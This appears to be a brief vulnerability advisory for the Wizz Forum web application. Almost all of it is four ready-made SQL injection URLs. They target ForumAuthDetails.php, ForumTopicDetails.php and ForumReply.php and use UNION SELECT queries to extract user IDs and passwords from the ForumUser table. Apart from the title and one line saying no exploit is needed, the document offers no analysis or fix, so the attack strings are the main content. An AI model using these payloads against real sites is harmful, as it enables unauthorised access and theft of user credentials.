|
Wizz Forum Multiple SQL Injection Vulnerabilities
No exploit is required. Example URI have been provided: http://www.example.com/ForumAuthDetails.php?AuthID=-4654'%20union%20select%20password,userid,password,userid,5,6,7,"http://www.example.com",lastlogin,lastlogin,lastlogin,5465465464,8$ http://www.example.com/ForumTopicDetails.php?TopicID=-10%20union%20select%201,userid,password,userid,joindate,4444444,4444444%20from%20ForumUser%20where%20user_index=1 http://www.example.com/ForumReply.php?TopicID=-10%20union%20select%201,userid,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1 http://www.example.com/ForumReply.php?TopicID=-10%20union%20select%201,password,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1 |
|
Privacy Statement |